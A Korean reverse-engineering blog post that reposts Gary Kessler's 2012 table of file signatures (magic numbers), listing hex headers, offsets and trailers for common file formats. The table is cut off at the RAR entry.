파일들의 매직넘버

리버싱
posted by 블르샤이닝 2012. 9. 25. 10:39
728x90

웅캬캬캬캬캬 퍼오기퍼오기퍼오기

-----------------------------------------------------------------------------------------------------

FILE SIGNATURES TABLE

11 June 2012


This table of file signatures (aka "magic numbers") is a continuing work-in-progress. I have found little information on this in a single place, with the exception of the table in Forensic Computing: A Practitioner's Guide by T. Sammes & B. Jenkinson (Springer, 2000); that was my inspiration to start this list. See also Wikipedia's List of file signatures. Comments, additions, and queries can be sent to Gary Kessler at gck@garykessler.net.

This list is not exhaustive. Interpret the table as the magic number generally indicating the file type rather than the file type always having the given magic number. If you want to know to what a particular file extension refers, check out some of these sites:

Some useful additional information:

ACKNOWLEDGEMENTS

Hex Signature   ASCII Signature
File Extension File Description

TGA Truevision Targa Graphic file
Trailer:
54 52 55 45 56 49 53 49   TRUEVISI
4F 4E 2D 58 46 49 4C 45   ON-XFILE
2E 00                     ..

00 .
PIC IBM Storyboard bitmap file
MOV Apple QuickTime movie file
PIF Windows Program Information File
SEA Mac Stuffit Self-Extracting Archive
YTR IRIS OCR data file

[11 byte offset]
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00		 [11 byte offset]
........
........
........
PDB Palmpilot Database/Document File

[512 byte offset]
00 00 00 00 00 00 00 00		 [512 byte offset]
........
RVT Revit Project File subheader

00 00 00 0C 6A 50 20 20
0D 0A		 ....jP 
..
JP2 Various JPEG-2000 image file formats

00 00 00 nn 66 74 79 70
33 67 70		 ....ftyp
3gp
3GG, 3GP, 3G2 3rd Generation Partnership Project 3GPP (nn=0x14)
and 3GPP2 (nn=0x20) multimedia files

00 00 00 14 66 74 79 70
69 73 6F 6D		 ....ftyp
isom
MP4 ISO Base Media file (MPEG-4) v1

00 00 00 14 66 74 79 70
71 74 20 20		 ....ftyp
qt
MOV QuickTime movie file

00 00 00 18 66 74 79 70
33 67 70 35		 ....ftyp
3gp5
MP4 MPEG-4 video files

00 00 00 18 66 74 79 70
6D 70 34 32		 ... ftyp
mp42
M4V MPEG-4 video/QuickTime file

00 00 00 20 66 74 79 70
4D 34 41 20		 ... ftyp
M4A
M4A Apple Lossless Audio Codec file

00 00 01 00 ....
ICO Windows icon file
SPL Windows NT/2000/XP printer spool file

00 00 01 Bx ....
MPEG, MPG MPEG video file
Trailer:
00 00 01 B7 (...·)

00 00 01 BA ....º
MPG, VOB DVD Video Movie File (video/dvd, video/mpeg) or DVD MPEG2
Trailer:
00 00 01 B9 (...¹)

00 00 02 00 ......
CUR Windows cursor file
WB2 QuattroPro for Windows Spreadsheet file

00 00 02 00 06 04 06 00
08 00 00 00 00 00		 ........
......
WK1 Lotus 1-2-3 spreadsheet (v1) file

00 00 1A 00 00 10 04 00
00 00 00 00		 ........
....
WK3 Lotus 1-2-3 spreadsheet (v3) file

00 00 1A 00 02 10 04 00
00 00 00 00		 ........
....
WK4, WK5 Lotus 1-2-3 spreadsheet (v4, v5) file

00 00 1A 00 05 10 04 .......
123 Lotus 1-2-3 spreadsheet (v9) file

00 00 49 49 58 50 52 or ..IIXPR
00 00 4D 4D 58 50 52 ..MMXPR
QXD Quark Express document (Intel & Motorola, respectively)
NOTE: It appears that the byte following the 0x52 ("R") is
the language indicator; 0x33 ("3") seems to indicate English
and 0x61 ("a") reportedly indicates Korean.

00 00 FE FF ..þÿ
n/a Byte-order mark for 32-bit Unicode Transformation Format/
4-octet Universal Character Set (UTF-32/UCS-4), big-endian files.
(See the Unicode Home Page.)

[6 byte offset]
00 00 FF FF FF FF		 [6 byte offset]
..ÿÿÿÿ
HLP Windows Help file

00 01 00 00 4D 53 49 53
41 4D 20 44 61 74 61 62
61 73 65		 ....MSIS
AM Datab
ase
MNY Microsoft Money file

00 01 00 00 53 74 61 6E
64 61 72 64 20 41 43 45
20 44 42		 ....Stan
dard ACE
 DB
ACCDB Microsoft Access 2007 file

00 01 00 00 53 74 61 6E
64 61 72 64 20 4A 65 74
20 44 42		 ....Stan
dard Jet
 DB
MDB Microsoft Access file

00 01 00 08 00 01 00 01
01		 ........
.
IMG Ventura Publisher/GEM VDI Image Format Bitmap file

00 01 01 ...
FLT OpenFlight 3D file

00 01 42 41 ..BA
ABA Palm Address Book Archive file

00 01 42 44 ..BD
DBA Palm DateBook Archive file

00 06 15 61 00 00 00 02
00 00 04 D2 00 00 10 00		 ...a....
...Ò....
DB Netscape Navigator (v4) database file

00 11 AF ..¯
FLI FLIC Animation file

00 14 00 00 01 02 xx xx
03		 ........
.
n/a BIOS details in RAM images

00 1E 84 90 00 00 00 00 ..„.....
SNM Netscape Communicator (v4) mail folder

00 5C 41 B1 FF .\A±ÿ
ENC Mujahideen Secrets 2 encrypted file

00 BF .¿
SOL Adobe Flash shared object file (e.g., Flash cookies)

[512 byte offset]
00 6E 1E F0		 [512 byte offset]
.n.ð
PPT PowerPoint presentation subheader (MS Office)

00 FF FF FF FF FF FF FF
FF FF FF 00 00 02 00 01		 .ÿÿÿÿÿÿÿ
ÿÿÿ.....
MDF Alcohol 120% CD image

01 00 00 00 ....
EMF Extended (Enhanced) Windows Metafile Format, printer spool file
(0x18-17 & 0xC4-36 is Win2K/NT; 0x5C0-1 is WinXP)

01 00 00 00 01 .....
PIC Unknown type picture file

01 00 09 00 00 03 ......
WMF Windows Metadata file (Win 3.x format)

01 00 39 30 ..90
FDB, GDB Firebird and Interbase database files, respectively. See
IBPhoenix for more information.

01 0F 00 00 ....
MDF Microsoft SQL Server 2000 database

01 10 ..
TR1 Novell LANalyzer capture file

01 DA 01 01 00 03 .Ú....
RGB Silicon Graphics RGB Bitmap

01 FF 02 04 03 02 .ÿ....
DRW Micrografx vector graphic file

02 64 73 73 .dss
DSS Digital Speech Standard (Olympus, Grundig, & Phillips)

03 .
DAT MapInfo Native Data Format
DB3 dBASE III file

03 00 00 00 ....
QPH Quicken price history file

03 00 00 00 41 50 50 52 ....APPR
ADX Approach index file

04 .
DB4 dBASE IV data file

04 00 00 00 xx xx xx xx
xx xx xx xx 20 03 00 00 or		 ........
.... ...
05 00 00 00 xx xx xx xx
xx xx xx xx 20 03 00 00		 ........
.... ...
n/a INFO2 Windows recycle bin file. NOTE: Bytes 12-13
indicate the size of each INFO2 record; the most common
value is 0x02-03 (0x0320 = 800 bytes).

07 .
DRW A common signature and file extension for many drawing
programs.

07 53 4B 46 .SKF
SKF SkinCrafter skin file

07 64 74 32 64 64 74 64 .dt2ddtd
DTD DesignTools 2D Design file

08 .
DB dBASE IV or dBFast configuration file

[512 byte offset]
09 08 10 00 00 06 05 00		 [512 byte offset]
........
XLS Excel spreadsheet subheader (MS Office)

0A nn 01 01 ....
PCX ZSOFT Paintbrush file
(where nn = 0x02, 0x03, or 0x05)

0C ED 
MP Monochrome Picture TIFF bitmap file (unconfirmed)

0D 44 4F 43 .DOC
DOC DeskMate Document file

0E 4E 65 72 6F 49 53 4F .NeroISO
NRI Nero CD Compilation

0E 57 4B 53 .WKS
WKS DeskMate Worksheet

[512 byte offset]
0F 00 E8 03		 [512 byte offset]
..è.
PPT PowerPoint presentation subheader (MS Office)

11 00 00 00 53 43 43 41 ....SCCA
PF Windows prefetch file

1A 00 00 ...
NTF Lotus Notes database template

1A 00 00 04 00 00 ......
NSF Lotus Notes database

1A 0x ..
ARC LH archive file, old version
(where x = 0x2, 0x3, 0x4, 0x8 or 0x9
for types 1-5, respectively)

1A 0B ..
PAK Compressed archive file
(often associated with Quake Engine games)

1A 35 01 00 .5..
ETH GN Nettest WinPharoah capture file

1A 45 DF A3 93 42 82 88
6D 61 74 72 6F 73 6B 61		 .Eߣ“B‚ˆ
matroska
MKV Matroska stream file

1A 52 54 53 20 43 4F 4D
50 52 45 53 53 45 44 20
49 4D 41 47 45 20 56 31
2E 30 1A		 .RTS COM
PRESSED 
IMAGE V1
.0.
DAT Runtime Software disk image

1D 7D .}
WS WordStar Version 5.0/6.0 document

1F 8B 08 .‹.
GZ, TGZ GZIP archive file

1F 9D ..
TAR.Z Compressed tape archive file using standard (Lempel-Ziv-Welch) compression

1F A0 
TAR.Z Compressed tape archive file using LZH (Lempel-Ziv-Huffman) compression

21 !
BSB MapInfo Sea Chart

21 12 !.
AIN AIN Compressed Archive

21 3C 61 72 63 68 3E 0A !<arch>.
LIB Unix archiver (ar) files and Microsoft Program Library
Common Object File Format (COFF)

21 42 44 4E !BDN
PST Microsoft Outlook Personal Folder File

23 20 #
MSI Cerius2 file

23 20 44 69 73 6B 20 44
65 73 63 72 69 70 74 6F		 # Disk D
escripto
VMDK VMware 4 Virtual Disk description file (split disk)

23 20 4D 69 63 72 6F 73
6F 66 74 20 44 65 76 65
6C 6F 70 65 72 20 53 74
75 64 69 6F		 # Micros
oft Deve
loper St
udio
DSP Microsoft Developer Studio project file

23 21 41 4D 52 #!AMR
AMR Adaptive Multi-Rate ACELP (Algebraic Code Excited Linear Prediction)
Codec, commonly audio format with GSM cell phones. (See RFC 4867.)

23 3F 52 41 44 49 41 4E
43 45 0A		 #?RADIAN
CE.
HDR Radiance High Dynamic Range image file

24 46 4C 32 40 28 23 29
20 53 50 53 53 20 44 41
54 41 20 46 49 4C 45		 $FL2@(#)
 SPSS DA
TA FILE
SAV SPSS Data file

25 21 50 53 2D 41 64 6F
62 65 2D 33 2E 30 20 45
50 53 46 2D 33 20 30		 %!PS-Ado
be-3.0 E
PSF-3.0
EPS Adobe encapsulated PostScript file
(If this signature is not at the immediate
beginning of the file, it will occur early
in the file, commonly at byte offset 30)

25 50 44 46 %PDF
PDF, FDF Adobe Portable Document Format and Forms Document file
Trailers:
0A 25 25 45 4F 46 (.%%EOF)
0A 25 25 45 4F 46 0A (.%%EOF.)
0D 0A 25 25 45 4F 46 0D 0A (..%%EOF..)
0D 25 25 45 4F 46 0D (.%%EOF.)
NOTE: There may be multiple end-of-file marks within the
file. When carving, be sure to get the last one.

28 54 68 69 73 20 66 69
6C 65 20 6D 75 73 74 20
62 65 20 63 6F 6E 76 65
72 74 65 64 20 77 69 74
68 20 42 69 6E 48 65 78
20		 (This fi
le must 
be conve
rted wit
h BinHex
 
HQX Macintosh BinHex 4 Compressed Archive

2A 2A 2A 20 20 49 6E 73
74 61 6C 6C 61 74 69 6F
6E 20 53 74 61 72 74 65
64 20		 ***  Ins
tallatio
n Starte
d
LOG Symantec Wise Installer log file

[2 byte offset]
2D 6C 68		 [2 byte offset]
-lh
LHA, LZH Compressed archive file

2E 52 45 43 .REC
IVR RealPlayer video file (V11 and later)

2E 52 4D 46 .RMF
RM, RMVB RealMedia streaming media file

2E 52 4D 46 00 00 00 12
00		 .RMF....
.
RA RealAudio file

2E 72 61 FD 00 .raý.
RA RealAudio streaming media file

2E 73 6E 64 .snd
AU NeXT/Sun Microsystems µ-Law audio file

30 0
CAT Microsoft security catalog file

30 00 00 00 4C 66 4C 65 0...LfLe
EVT Windows Event Viewer file

30 26 B2 75 8E 66 CF 11
A6 D9 00 AA 00 62 CE 6C		 0&²u.fÏ.
¦Ù.ª.bÎl
ASF, WMA, WMV Microsoft Windows Media Audio/Video File
(Advanced Streaming Format)

30 31 4F 52 44 4E 41 4E
43 45 20 53 55 52 56 45
59 20 20 20 20 20 20 20		 01ORDNAN
CE SURVE
Y
NTF National Transfer Format Map File

30 37 30 37 30 nn 07070.
n/a Archive created with the cpio utility (where nn
values 0x37 ("7"), 0x31 ("1"), and 0x32 ("2") refer to the
standard ASCII format, new ASCII (aka SVR4) format, and CRC
format, respectively. (The swpackage(8) page has additional
information.) (Thanks to F. Webber for this....)

31 BE or 
32 BE 
WRI Microsoft Write file

34 CD B2 A1 4Ͳ¡
n/a Extended tcpdump (libpcap) capture file (Linux/Unix)

37 7A BC AF 27 1C 7z¼¯'.
7Z 7-Zip compressed file

37 E4 53 96 C9 DB D6 07 7äS–ÛÖ.
n/a zisofs compression format, recognized by some Linux kernels. See the
libburnia page for additional information.

38 42 50 53 8BPS
PSD Photoshop image file

3A 56 45 52 53 49 4F 4E :VERSION
SLE Surfplan kite project file

3C <
ASX Advanced Stream redirector file
XDR BizTalk XML-Data Reduced Schema file

3C 21 64 6F 63 74 79 70 <!doctyp
DCI AOL HTML mail file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D		 <?xml ve
rsion=
MANIFEST Windows Visual Stylesheet XML file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D 22 31
2E 30 22 3F 3E		 <?xml ve
rsion="1
.0"?>
XUL XML User Interface Language file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D 22 31
2E 30 22 3F 3E 0D 0A 3C
4D 4D 43 5F 43 6F 6E 73
6F 6C 65 46 69 6C 65 20
43 6F 6E 73 6F 6C 65 56
65 72 73 69 6F 6E 3D 22		 <?xml ve
rsion="1
.0"?>..<
MMC_Cons
oleFile 
ConsoleV
ersion="
MSC Microsoft Management Console Snap-in Control file

3C 4D 61 6B 65 72 46 69
6C 65 20		 <MakerFi
le
FM, MIF Adobe FrameMaker file

[24 byte offset]
3E 00 03 00 FE FF 09 00
06		 [24 byte offset]
>...þÿ..
.
WB3 Quatro Pro for Windows 7.0 Notebook file

3F 5F 03 00 ?_..
GID Windows Help index file
HLP Windows Help file

[32 byte offset]
40 40 40 20 00 00 40 40
40 40		 [32 byte offset]
@@@ ..@@
@@
ENL EndNote Library File

41 43 31 30 AC10
DWG Generic AutoCAD drawing

NOTES on AutoCAD file headers: The 0x41-43-31-30 (AC10) is a generic header, occupying the first
four bytes in the file. The next two bytes give further indication about the version or subtype:

  • 0x30-32 (02) — AutoCAD R2.5
  • 0x30-33 (03) — AutoCAD R2.6
  • 0x30-34 (04) — AutoCAD R9
  • 0x30-36 (06) — AutoCAD R10
  • 0x30-39 (09) — AutoCAD R11/R12
  • 0x31-30 (10) — AutoCAD R13 (subtype 10)
  • 0x31-31 (11) — AutoCAD R13 (subtype 11)
  • 0x31-32 (12) — AutoCAD R13 (subtype 12)
  • 0x31-33 (13) — AutoCAD R14 (subtype 13)
  • 0x31-34 (14) — AutoCAD R14 (subtype 14)
  • 0x31-35 (15) — AutoCAD R2000
  • 0x31-38 (18) — AutoCAD R2004
  • 0x32-31 (21) — AutoCAD R2007
41 43 76 ACL
SLE Steganos Security Suite virtual secure drive

41 43 53 44 ACSD
n/a Miscellaneous AOL parameter and information files

41 45 53 AES
AES AES Crypt file format. (The fourth byte is the version number.)

41 4D 59 4F AMYO
SYW Harvard Graphics symbol graphic

41 4F 4C 20 46 65 65 64
62 61 67		 AOL Feed
bag
BAG AOL and AIM buddy list file

41 4F 4C 44 42 AOLDB
ABY, IDX AOL database files: address book (ABY) and user configuration
data (MAIN.IDX)

41 4F 4C 49 44 58 AOLIDX
IND AOL client preferences/settings file (MAIN.IND)

41 4F 4C 49 4E 44 45 58 AOLINDEX
ABI AOL address book index file

41 4F 4C 56 4D 31 30 30 AOLVM100
ORG, PFC AOL personal file cabinet (PFC) file

41 56 47 36 5F 49 6E 74
65 67 72 69 74 79 5F 44
61 74 61 62 61 73 65		 AVG6_Int
egrity_D
atabase
DAT AVG6 Integrity database file

41 72 43 01 ArC.
ARC FreeArc compressed file

42 41 41 44 BAAD
n/a NTFS Master File Table (MFT) entry (1,024 bytes)

42 45 47 49 4E 3A 56 43
41 52 44 0D 0A		 BEGIN:VC
ARD..
VCF vCard file

42 4C 49 32 32 33 51 BLI223Q
BIN Thomson Speedtouch series WLAN router firmware

42 4D BM
BMP, DIB Windows (or device-independent) bitmap image
NOTE: Bytes 2-5 contain the file length in little-endian order.

42 4F 4F 4B 4D 4F 42 49 BOOKMOBI
PRC Palmpilot resource file

42 5A 68 BZh
BZ2, TAR.BZ2, TBZ2, TB2 bzip2 compressed archive

43 23 2B 44 A4 43 4D A5
48 64 72		 C#+D¤CM¥
Hdr
RTD RagTime document file

43 42 46 49 4C 45 CBFILE
CBD WordPerfect dictionary file (unconfirmed)

43 44 30 30 31 CD001
ISO ISO-9660 CD Disc Image
This signature usually occurs at byte offset 32769 (0x8001),
34817 (0x8801), or 36865 (0x9001).
More information can be found at MacTech or at ECMA.

43 4D 58 31 CMX1
CLB Corel Binary metafile

43 4F 4D 2B COM+
CLB COM+ Catalog file

43 4F 57 44 COWD
VMDK VMware 3 Virtual Disk (portion of a split disk) file

43 50 54 37 46 49 4C 45 CPT7FILE
CPT Corel Photopaint file

43 50 54 46 49 4C 45 CPTFILE
CPT Corel Photopaint file

43 52 45 47 CREG
DAT Windows 9x registry hive

43 52 55 53 48 20 76 CRUSH v
CRU Crush compressed archive

43 57 53 CWS
SWF Shockwave Flash file (v5+)

43 61 74 61 6C 6F 67 20
33 2E 30 30 00		 Catalog 
3.00.
CTF WhereIsIt Catalog file

43 6C 69 65 6E 74 20 55
72 6C 43 61 63 68 65 20
4D 4D 46 20 56 65 72 20		 Client U
rlCache 
MMF Ver
DAT IE History (index.dat) file

44 42 46 48 DBFH
DB Palm Zire photo database

44 4D 53 21 DMS!
DMS Amiga DiskMasher compressed archive

44 4F 53 DOS
ADF Amiga disk file

44 56 44 DVD
DVR DVR-Studio stream file
IFO DVD info file

45 4C 49 54 45 20 43 6F
6D 6D 61 6E 64 65 72 20		 ELITE Co
mmander
CDR Elite Plus Commander saved game file

45 4E 54 52 59 56 43 44
02 00 00 01 02 00 18 58		 ENTRYVCD
.......X
VCD VideoVCD (GNU VCDImager) file

45 52 46 53 53 41 56 45
44 41 54 41 46 49 4C 45		 ERFSSAVE
DATAFILE
DAT Kroll EasyRecovery Saved Recovery State file

45 50 EP
MDI Microsoft Document Imaging file

45 56 46 09 0D 0A FF 00 EVF...ÿ.
Enn (where nn are numbers) Expert Witness Compression Format (EWF) file, including EWF-E01
and EWF-S01, as used in EnCase and SMART evidence files.
See the EWF specification.

45 56 46 32 0D 0A 81 EVF2...
Exnn (where nn are numbers) EnCase® Evidence File Format Version 2 (Ex01).
See the document.

45 6C 66 46 69 6C 65 00 ElfFile.
EVTX Windows Vista event log file

45 86 00 00 06 00 E†....
QBB Intuit QuickBooks backup file

46 41 58 43 4F 56 45 52
2D 56 45 52		 FAXCOVER
-VER
CPE Microsoft Fax Cover Sheet

46 44 42 48 00 FDBH.
FDB Fiasco database definition file

46 45 44 46 FEDF
SBV (Unknown file type)

46 49 4C 45 FILE
n/a NTFS Master File Table (MFT) entry (1,024 bytes)

46 4C 56 01 FLV.
FLV Flash video file

46 4F 52 4D 00 FORM.
AIFF Audio Interchange File

46 57 53 FWS
SWF Macromedia Shockwave Flash player file

46 72 6F 6D 20 20 20 or From
46 72 6F 6D 20 3F 3F 3F or From ???
46 72 6F 6D 3A 20 From:
EML A commmon file extension for e-mail files. Signatures shown here
are for Netscape, Eudora, and a generic signature, respectively.
EML is also used by Outlook Express and QuickMail.

47 46 31 50 41 54 43 48 GF1PATCH
PAT Advanced Gravis Ultrasound patch file

47 49 46 38 37 61 or GIF87a
47 49 46 38 39 61 GIF89a
GIF Graphics interchange format file
Trailer: 00 3B (.;)

47 50 41 54 GPAT
PAT GIMP (GNU Image Manipulation Program) pattern file

47 58 32 GX2
GX2 Show Partner graphics file (not confirmed)

47 65 6E 65 74 65 63 20
4F 6D 6E 69 63 61 73 74		 Genetec 
Omnicast
G64 Genetec video archive

48 48 47 42 31 HHGB1
SH3 Harvard Graphics presentation file

49 20 49 I I
TIF, TIFF Tagged Image File Format file

49 44 33 ID3
MP3 MPEG-1 Audio Layer 3 (MP3) audio file

49 44 33 03 00 00 00 ID3....
KOZ Sprint Music Store audio file (for mobile devices)

49 49 1A 00 00 00 48 45
41 50 43 43 44 52 02 00		 II....HE
APCCDR..
CRW Canon digital camera RAW file

49 49 2A 00 II*.
TIF, TIFF Tagged Image File Format file (little
endian, i.e., LSB first in the byte; Intel)

49 49 2A 00 10 00 00 00
43 52		 II*.....
CR
CR2 Canon digital camera RAW file

49 53 63 28 ISc(
CAB, HDR Install Shield v5.x or 6.x compressed file

49 54 4F 4C 49 54 4C 53 ITOLITLS
LIT Microsoft Reader eBook file

49 54 53 46 ITSF
CHI, CHM Microsoft Compiled HTML Help File

49 6E 6E 6F 20 53 65 74
75 70 20 55 6E 69 6E 73
74 61 6C 6C 20 4C 6F 67
20 28 62 29		 Inno Set
up Unins
tall Log
 (b)
DAT Inno Setup Uninstall Log file

49 6E 74 65 72 40 63 74
69 76 65 20 50 61 67 65		 Inter@ct
ive Page
IPD Inter@ctive Pager Backup (BlackBerry) backup file
(See also IPD File Format page or IPD File for BlackBerry)

4A 41 52 43 53 00 JARCS.
JAR JARCS compressed archive

4A 47 03 0E or JG..
4A 47 04 0E JG..
ART AOL ART file
Trailers:
For 0x4A-47-03-0E: D0 CB 00 00 (ÐË..)
For 0x4A-47-04-0E: CF C7 CB (ÏÇË)

4B 44 4D KDM
VMDK VMware 4 Virtual Disk (portion of a split disk) file

4B 44 4D 56 KDMV
VMDK VMware 4 Virtual Disk (monolitic disk) file

4B 47 42 5F 61 72 63 68
20 2D		 KGB_arch
 -
KGB KGB archive

4B 49 00 00 KI..
SHD Windows 9x printer spool file

4B 57 41 4A 88 F0 27 D1 KWAJˆð'Ñ
n/a KWAJ file format used by DOS COMPRESS.EXE and EXPAND.EXE commands.
This command compresses a single file, replacing the last character in the file name
with an underscore or dollar sign, e.g., FOO.BAZ would be renamed FOO.BA_ or
FOO.BA$. (See the SZDD/KWAJ page for more information.)

4C 00 00 00 01 14 02 00 L.......
LNK Windows shortcut file. See also The Meaning of Linkfiles in Forensic Examinations.

4C 01 L.
OBJ Microsoft Common Object File Format (COFF) relocatable
object code file for an Intel 386 or later/compatible processors

4C 4E 02 00 LN..
GID Windows Help index file
HLP Windows Help file. 

4C 56 46 09 0D 0A FF 00 LVF...ÿ.
Enn (where nn are numbers) Logical File Evidence Format (EWF-L01) as used in later versions of
EnCase evidence files. See the EWF specification.

4D 2D 57 20 50 6F 63 6B
65 74 20 44 69 63 74 69		 M-W Pock
et Dicti
PDB Merriam-Webster Pocket Dictionary file

4D 41 52 31 00 MAR1.
MAR Mozilla archive

4D 41 52 43 MARC
MAR Microsoft/MSN MARC archive

4D 41 72 30 00 MAr0.
MAR MAr compressed archive

4D 44 4D 50 93 A7 MDMP“§
HDMP Windows heap dump file
DMP Windows minidump file

4D 49 4C 45 53 MILES
MLS Milestones v1.0 project management and scheduling software
(Also see "MV2C" and "MV214" signatures)

4D 4C 53 57 MLSW
MLS Skype localization data file

4D 4D 00 2A MM.*
TIF, TIFF Tagged Image File Format file (big
endian, i.e., LSB last in the byte; Motorola)

4D 4D 00 2B MM.+
TIF, TIFF BigTIFF files; Tagged Image File Format files >4 GB

4D 4D 4D 44 00 00 MMMD..
MMF Yamaha Corp. Synthetic music Mobile Application Format (SMAF)
for multimedia files that can be played on hand-held devices.

4D 52 56 4E MRVN
NVRAM VMware BIOS (non-volatile RAM) state file.

4D 53 43 46 MSCF
CAB Microsoft cabinet file
PPZ Powerpoint Packaged Presentation
SNP Microsoft Access Snapshot Viewer file

4D 53 46 54 02 00 01 00 MSFT....
TLB OLE, SPSS, or Visual C++ type library file

4D 53 5F 56 4F 49 43 45 MS_VOICE
CDR, DVF Sony Compressed Voice File
MSV Sony Memory Stick Compressed Voice file

4D 54 68 64 MThd
MID, MIDI Musical Instrument Digital Interface (MIDI) sound file

4D 56 MV
DSN CD Stomper Pro label file

4D 56 32 31 34 MV214
MLS Milestones v2.1b project management and scheduling software
(Also see "MILES" and "MV2C" signatures)

4D 56 32 43 MV2C
MLS Milestones v2.1a project management and scheduling software
(Also see "MILES" and "MV214" signatures)

4D 5A MZ
COM, DLL, DRV, EXE, PIF, QTS, QTX, SYS Windows/DOS executable file
(See The MZ EXE File Format page for the structure of an EXE file,
with coverage of NE, TLINK, PE, self-extracting archives, and more.)
ACM MS audio compression manager driver
AX Library cache file
CPL Control panel application
FON Font file
OCX ActiveX or OLE Custom Control
OLB OLE object library
SCR Screen saver
VBX VisualBASIC application
VXD, 386 Windows virtual device drivers

4D 5A 90 00 03 00 00 00 MZ......
API Acrobat plug-in
AX DirectShow filter
FLT Audition graphic filter file (Adobe)

4D 5A 90 00 03 00 00 00
04 00 00 00 FF FF		 MZ......
....ÿÿ
ZAP ZoneAlam data file

4D 69 63 72 6F 73 6F 66
74 20 43 2F 43 2B 2B 20		 Microsof
t C/C++
PDB Microsoft C++ debugging symbols file

4D 69 63 72 6F 73 6F 66
74 20 56 69 73 75 61 6C
20 53 74 75 64 69 6F 20
53 6F 6C 75 74 69 6F 6E
20 46 69 6C 65		 Microsof
t Visual
 Studio 
Solution
 File
SLN Visual Studio .NET Solution file

[84 byte offset]
4D 69 63 72 6F 73 6F 66
74 20 57 69 6E 64 6F 77
73 20 4D 65 64 69 61 20
50 6C 61 79 65 72 20 2D
2D 20		 [84 byte offset]
Microsof
t Window
s Media 
Player -
-
WPL Windows Media Player playlist

4D 73 52 63 66 MsRcf
GDB VMapSource GPS Waypoint Database

4E 41 56 54 52 41 46 46
49 43		 NAVTRAFF
IC
DAT TomTom traffic data file

4E 42 2A 00 NB*.
JNT, JTP MS Windows journal file

4E 45 53 4D 1A 01 NESM..
NSF NES Sound file

4E 49 54 46 30 NITF0
NTF National Imagery Transmission Format (NITF) file

4E 61 6D 65 3A 20 Name:
COD Agent newsreader character map file

4F 50 4C 44 61 74 61 62
61 73 65 46 69 6C 65		 OPLDatab
aseFile
DBF Psion Series 3 Database file

4F 67 67 53 00 02 00 00
00 00 00 00 00 00		 OggS....
......
OGA, OGG, OGV, OGX Ogg Vorbis Codec compressed Multimedia file

4F 7B O{
DW4 Visio/DisplayWrite 4 text file (unconfirmed)

50 00 00 00 20 00 00 00 P... ...
IDX Quicken QuickFinder Information File

50 35 0A P5.
PGM Portable Graymap Graphic

50 41 43 4B PACK
PAK Quake archive file

50 41 47 45 44 55 36 34 PAGEDU64
DMP Windows 64-bit memory dump

50 41 47 45 44 55 4D 50 PAGEDUMP
DMP Windows memory dump

50 41 58 PAX
PAX PAX password protected bitmap

50 45 53 54 PEST
DAT PestPatrol data/scan strings

50 47 50 64 4D 41 49 4E PGPdMAIN
PGD PGP disk image

50 49 43 54 00 08 PICT..
IMG ADEX Corp. ChromaGraph Graphics Card Bitmap Graphic file

50 4B 03 04 PK..
ZIP PKZIP archive file (Ref. 1 | Ref. 2)
Trailer: filename 50 4B 17 characters 00 00 00
Trailer: (filename PK 17 characters ...)
ZIP Apple Mac OS X Dashboard Widget, Aston Shell theme, Oolite eXpansion Pack,
Opera Widget, Pivot Style Template, Rockbox Theme package, Simple Machines
Forums theme, SubEthaEdit Mode, Trillian zipped skin, Virtual Skipper skin
JAR Java archive; compressed file package for classes and data
KWD KWord document
ODT, ODP, OTT OpenDocument text document, presentation, and text document template, respectively.
SXC, SXD, SXI, SXW OpenOffice spreadsheet (Calc), drawing (Draw), presentation (Impress),
and word processing (Writer) files, respectively.
SXC StarOffice spreadsheet
WMZ Windows Media compressed skin file
XPI Mozilla Browser Archive
XPS XML paper specification file
XPT eXact Packager Models

50 4B 03 04 14 00 01 00
63 00 00 00 00 00		 PK......
c.....
ZIP ZLock Pro encrypted ZIP

50 4B 03 04 14 00 06 00 PK......
DOCX, PPTX, XLSX Microsoft Office Open XML Format (OOXML) Document
NOTE: There is no subheader for MS OOXML files as there is with
DOC, PPT, and XLS files. To better understand the format of these files,
rename any OOXML file to have a .ZIP extension and then unZIP the file;
look at the resultant file named [Content_Types].xml to see the content
types. In particular, look for the <Override PartName= tag, where you
will find wordppt, or xl, respectively.

Trailer: Look for 50 4B 05 06 (PK..) followed by 18 additional bytes
at the end of the file.

50 4B 03 04 14 00 08 00
08 00		 PK......
..
JAR Java archive

50 4B 05 06 PK..
50 4B 07 08 PK..
ZIP PKZIP empty and multivolume archive file, respectively

[30 byte offset]
50 4B 4C 49 54 45		 [30 byte offset]
PKLITE
ZIP PKLITE compressed ZIP archive (see also PKZIP)

[526 byte offset]
50 4B 53 70 58		 [526 byte offset]
PKSFX
ZIP PKSFX self-extracting executable compressed file (see also PKZIP)

50 4D 43 43 PMCC
GRP Windows Program Manager group file

50 4E 43 49 55 4E 44 4F PNCIUNDO
DAT Norton Disk Doctor undo file

[92 byte offset]
51 45 4C 20		 [92 byte offset]
QEL
QEL Quicken data file

51 46 49 FB QFIû
IMG QEMU Qcow Disk Image

51 57 20 56 65 72 2E 20 QW Ver.
ABD, QSD Quicken data file

52 41 5A 41 54 44 42 31 RAZATDB1
DAT Shareaza (Windows P2P client) thumbnail

52 45 47 45 44 49 54 REGEDIT
REG, SUD Windows NT Registry and Registry Undo files

52 45 56 4E 55 4D 3A 2C REVNUM:,
ADF Antenna data file

52 49 46 46 RIFF
ANI Windows animated cursor
CMX Corel Presentation Exchange (Corel 10 CMX) Metafile
CDR CorelDraw document
DAT Video CD MPEG or MPEG1 movie file

DS4 Micrografx Designer v4 graphic file
4XM 4X Movie video

52 49 46 46 xx xx xx xx
41 56 49 20 4C 49 53 54		 RIFF....
AVI LIST
AVI Resource Interchange File Format -- Windows Audio
Video Interleave file

52 49 46 46 xx xx xx xx
43 44 44 41 66 6D 74 20		 RIFF....
CDDAfmt
CDA Resource Interchange File Format -- Compact Disc
Digital Audio (CD-DA) file

52 49 46 46 xx xx xx xx
51 4C 43 4D 66 6D 74 20		 RIFF....
QLCMfmt
QCP Resource Interchange File Format -- Qualcomm
PureVoice

52 49 46 46 xx xx xx xx
52 4D 49 44 64 61 74 61		 RIFF....
RMIDdata
RMI Resource Interchange File Format -- Windows Musical
Instrument Digital Interface file

52 49 46 46 xx xx xx xx
57 41 56 45 66 6D 74 20		 RIFF....
WAVEfmt
WAV Resource Interchange File Format -- Audio for
Windows file

52 54 53 53 RTSS
CAP Windows NT Netmon capture file

52 61 72 21 1A 07 00 Rar!...
